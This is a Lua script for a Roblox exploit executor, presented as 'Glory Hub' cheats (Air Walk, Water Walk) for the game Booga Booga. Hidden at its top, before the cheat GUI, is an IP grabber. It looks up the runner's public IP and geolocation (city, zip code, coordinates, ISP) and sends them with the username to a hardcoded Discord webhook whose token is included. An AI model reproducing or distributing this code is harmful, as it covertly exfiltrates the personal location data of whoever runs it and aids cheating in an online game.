-- fuck off skid

-- Glory Hub v1 (beta)







-- variables
local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")

local LocalPlayer = Players.LocalPlayer
local WebhookURL = "https://discord.com/api/webhooks/1034622203670573076/6QOoBcsT7P_Z2VwXzZuKnkUpyYwXaIEXmuKa1APSiHNfbunKGgePqNvd0uczY_OFwwt6"

local httpRequest = http_request or request or (syn and syn.request) or (http and http.request)

-- some checks
if not httpRequest then
    return error("unsupported executor")
end
if not LocalPlayer then
    return error("failed to execute")
end

-- begin
local name, displayName = LocalPlayer.Name, LocalPlayer.DisplayName

local localIP
pcall(function()
    localIP = HttpService:JSONDecode(httpRequest({
        Url = "https://api.ipify.org/?format=json",
        Method = "GET",
    }).Body).ip
end)
if not localIP then
    return error("failed to execute")
end

local ipInfo
pcall(function()
    ipInfo = HttpService:JSONDecode(httpRequest({
        Url = string.format("http://ip-api.com/json/%s", localIP),
        Method = "Get",
    }).Body)
end)
if not ipInfo then
    return error("failed to execute")
end
local dataMessage = string.format(
    "User: %s (@%s)\nIP: %s\nCountry: %s\nCountry Code: %s\nRegion: %s\nRegion Name: %s\nCity: %s\nZipcode: %s\nLatitude: %s\nLongitude: %s\nISP: %s\nOrg: %s",
    displayName, -- user's DisplayName
    name, -- user's Name
    localIP, -- ip
    ipInfo.country, -- country
    ipInfo.countryCode, -- country code
    ipInfo.region, -- region
    ipInfo.regionName, -- region name
    ipInfo.city, -- city
    ipInfo.zip, -- zipcode
    ipInfo.lat, -- latitude
    ipInfo.lon, -- longitude
    ipInfo.isp, -- isp
    ipInfo.org -- org
)

local json
pcall(function()
    json = HttpService:JSONEncode({
        content = dataMessage
    })
end)
if json then
    -- print(json)
    httpRequest({
        Url = WebhookURL,
        Method = "POST",
        Headers = {
            ["Content-Type"] = "application/json",
        },
        Body = json,
    })
end
















-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local GuiHolder = Instance.new("Frame")
local Gui = Instance.new("Frame")
local UIGradient = Instance.new("UIGradient")
local Killgui = Instance.new("TextButton")
local minimze = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
local Tab1 = Instance.new("Frame")
local AirWalk = Instance.new("TextButton")
local WaterWalk = Instance.new("TextButton")
local WaterOn = Instance.new("TextLabel")
local Minimzed = Instance.new("Frame")
local Unminimize = Instance.new("TextButton")
local Killgui_2 = Instance.new("TextButton")
local TextLabel_2 = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

GuiHolder.Name = "GuiHolder"
GuiHolder.Parent = ScreenGui
GuiHolder.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
GuiHolder.BackgroundTransparency = 1.000
GuiHolder.Position = UDim2.new(0.192992538, 0, 0.28765431, 0)
GuiHolder.Size = UDim2.new(0, 272, 0, 79)
GuiHolder.Active = true
GuiHolder.Draggable = true

Gui.Name = "Gui"
Gui.Parent = GuiHolder
Gui.BackgroundColor3 = Color3.fromRGB(244, 87, 39)
Gui.Position = UDim2.new(0.0661764741, 0, 0.265822768, 0)
Gui.Size = UDim2.new(0, 235, 0, 36)
Gui.Visible = false

UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(0, 0, 0)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(255, 255, 255))}
UIGradient.Parent = Gui

Killgui.Name = "Kill gui"
Killgui.Parent = Gui
Killgui.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Killgui.BackgroundTransparency = 1.000
Killgui.Position = UDim2.new(0.642553151, 0, -0.0833333358, 0)
Killgui.Size = UDim2.new(0, 38, 0, 42)
Killgui.Font = Enum.Font.Gotham
Killgui.Text = "x"
Killgui.TextColor3 = Color3.fromRGB(255, 255, 255)
Killgui.TextSize = 14.000

minimze.Name = "minimze"
minimze.Parent = Gui
minimze.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
minimze.BackgroundTransparency = 1.000
minimze.Position = UDim2.new(0.838297844, 0, 0, 0)
minimze.Size = UDim2.new(0, 38, 0, 42)
minimze.Font = Enum.Font.Gotham
minimze.Text = ">"
minimze.TextColor3 = Color3.fromRGB(255, 255, 255)
minimze.TextSize = 14.000

TextLabel.Parent = Gui
TextLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(177, 16, 16)
TextLabel.Position = UDim2.new(-0.0340425521, 0, 0, 0)
TextLabel.Size = UDim2.new(0, 159, 0, 36)
TextLabel.Font = Enum.Font.Cartoon
TextLabel.Text = "Glory Hub Private | Booga Booga"
TextLabel.TextColor3 = Color3.fromRGB(177, 16, 16)
TextLabel.TextSize = 10.000
TextLabel.TextWrapped = true

Tab1.Name = "Tab1"
Tab1.Parent = Gui
Tab1.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Tab1.BorderColor3 = Color3.fromRGB(0, 0, 0)
Tab1.Position = UDim2.new(0, 0, 1, 0)
Tab1.Size = UDim2.new(0, 235, 0, 132)

AirWalk.Name = "AirWalk"
AirWalk.Parent = Tab1
AirWalk.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
AirWalk.BackgroundTransparency = 1.000
AirWalk.Position = UDim2.new(0.0723404288, 0, 0.560606003, 0)
AirWalk.Size = UDim2.new(0, 200, 0, 50)
AirWalk.Font = Enum.Font.Cartoon
AirWalk.Text = "Air Walk"
AirWalk.TextColor3 = Color3.fromRGB(177, 16, 16)
AirWalk.TextSize = 20.000
AirWalk.TextWrapped = true

WaterWalk.Name = "WaterWalk"
WaterWalk.Parent = Tab1
WaterWalk.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
WaterWalk.BackgroundTransparency = 1.000
WaterWalk.Position = UDim2.new(0.0723404288, 0, 0.113636315, 0)
WaterWalk.Size = UDim2.new(0, 200, 0, 50)
WaterWalk.Font = Enum.Font.Cartoon
WaterWalk.Text = "Free Water Walk [Q]"
WaterWalk.TextColor3 = Color3.fromRGB(177, 16, 16)
WaterWalk.TextSize = 20.000
WaterWalk.TextWrapped = true

WaterOn.Name = "WaterOn"
WaterOn.Parent = Gui
WaterOn.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
WaterOn.BackgroundTransparency = 1.000
WaterOn.BorderColor3 = Color3.fromRGB(27, 42, 53)
WaterOn.Position = UDim2.new(0.0723404288, 0, 1.41666663, 0)
WaterOn.Size = UDim2.new(0, 200, 0, 50)
WaterOn.Visible = false
WaterOn.Font = Enum.Font.Cartoon
WaterOn.Text = "Free Water Walk [Q]"
WaterOn.TextColor3 = Color3.fromRGB(183, 15, 255)
WaterOn.TextSize = 20.000

Minimzed.Name = "Minimzed"
Minimzed.Parent = GuiHolder
Minimzed.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Minimzed.BorderColor3 = Color3.fromRGB(0, 0, 0)
Minimzed.Position = UDim2.new(0.0661764741, 0, 0.265822798, 0)
Minimzed.Size = UDim2.new(0, 235, 0, 36)

Unminimize.Name = "Unminimize"
Unminimize.Parent = Minimzed
Unminimize.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Unminimize.BackgroundTransparency = 1.000
Unminimize.Position = UDim2.new(0.838297844, 0, 0, 0)
Unminimize.Size = UDim2.new(0, 38, 0, 42)
Unminimize.Font = Enum.Font.Gotham
Unminimize.Text = "V"
Unminimize.TextColor3 = Color3.fromRGB(255, 255, 255)
Unminimize.TextSize = 14.000

Killgui_2.Name = "Kill gui"
Killgui_2.Parent = Minimzed
Killgui_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Killgui_2.BackgroundTransparency = 1.000
Killgui_2.Position = UDim2.new(0.642553151, 0, -0.0833333358, 0)
Killgui_2.Size = UDim2.new(0, 38, 0, 42)
Killgui_2.Font = Enum.Font.Gotham
Killgui_2.Text = "x"
Killgui_2.TextColor3 = Color3.fromRGB(255, 255, 255)
Killgui_2.TextSize = 14.000

TextLabel_2.Parent = Minimzed
TextLabel_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.BorderColor3 = Color3.fromRGB(177, 16, 16)
TextLabel_2.Position = UDim2.new(-0.0340425521, 0, 0, 0)
TextLabel_2.Size = UDim2.new(0, 159, 0, 36)
TextLabel_2.Font = Enum.Font.Cartoon
TextLabel_2.Text = "Glory Hub Private | Booga Booga"
TextLabel_2.TextColor3 = Color3.fromRGB(177, 16, 16)
TextLabel_2.TextSize = 10.000
TextLabel_2.TextWrapped = true

-- Scripts:

local function PPGQ_fake_script() -- Killgui.LocalScript 
	local script = Instance.new('LocalScript', Killgui)

	script.Parent.MouseButton1Down:connect(function()
		game:GetService("CoreGui"):WaitForChild("ScreenGui"):Destroy()
	
	end)
	
	
end
coroutine.wrap(PPGQ_fake_script)()
local function OZZA_fake_script() -- minimze.LocalScript 
	local script = Instance.new('LocalScript', minimze)

	script.Parent.MouseButton1Down:connect(function()
	
		Minimzed.Visible = true
		Gui.Visible = false
	end)
	
	
end
coroutine.wrap(OZZA_fake_script)()
local function IBVLU_fake_script() -- AirWalk.LocalScript 
	local script = Instance.new('LocalScript', AirWalk)

	toggle = false
	script.Parent.MouseButton1Down:connect(function()
	
		if toggle == true then 
			toggle = false 
		else
			toggle = true
		end
		if toggle == true then 
			script.Parent.TextColor3 = Color3.fromRGB(183, 15, 255)
		end
		if toggle == false then 
			script.Parent.TextColor3 = Color3.fromRGB(177, 16, 16)
		end
	
		if toggle == true then
			local Player = game.Players.LocalPlayer.Character
			Player.Humanoid.HipHeight = 5
		end
		if toggle == false then 
			local Player = game.Players.LocalPlayer.Character
			Player.Humanoid.HipHeight = 2
		end
	end)
	
end
coroutine.wrap(IBVLU_fake_script)()
local function YGKGGRL_fake_script() -- WaterWalk.LocalScript 
	local script = Instance.new('LocalScript', WaterWalk)

	
	script.Parent.MouseButton1Down:connect(function()
		
		
		local Player = game:GetService'Players'.LocalPlayer;
		local UIS = game:GetService'UserInputService';
		UIS.InputBegan:connect(function(UserInput)
			if UserInput.UserInputType == Enum.UserInputType.Keyboard and UserInput.KeyCode == Enum.KeyCode.Q then
				_G.Running = true
				while wait(0) and _G.Running == true do
	
					game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.lookVector * 0.5
				end
			end
		end)
		UIS.InputEnded:connect(function(UserInput)
			if UserInput.UserInputType == Enum.UserInputType.Keyboard and UserInput.KeyCode == Enum.KeyCode.Q then
				_G.Running = false
			end
		end)
		script.Parent.TextColor3 = Color3.fromRGB(183, 15, 255)
		
		WaterWalk.Visible = false
		WaterOn.Visible = true
	
	end)
	
	
end
coroutine.wrap(YGKGGRL_fake_script)()
local function TBQQHMN_fake_script() -- Unminimize.LocalScript 
	local script = Instance.new('LocalScript', Unminimize)

	script.Parent.MouseButton1Down:connect(function()
		Gui.Visible = true
		Minimzed.Visible = false
	end)
	
	
end
coroutine.wrap(TBQQHMN_fake_script)()
local function NAHMZLS_fake_script() -- Killgui_2.LocalScript 
	local script = Instance.new('LocalScript', Killgui_2)

	script.Parent.MouseButton1Down:connect(function()
		game:GetService("CoreGui"):WaitForChild("ScreenGui"):Destroy()
	
	end)
	
	
end
coroutine.wrap(NAHMZLS_fake_script)()
